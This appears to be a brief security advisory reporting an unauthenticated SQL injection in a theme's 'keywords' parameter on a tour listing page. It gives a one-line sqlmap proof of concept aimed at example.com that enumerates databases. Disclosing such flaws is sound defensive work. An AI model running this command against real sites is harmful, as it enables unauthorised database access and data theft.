The theme did not sanitise, validate of escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue
sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords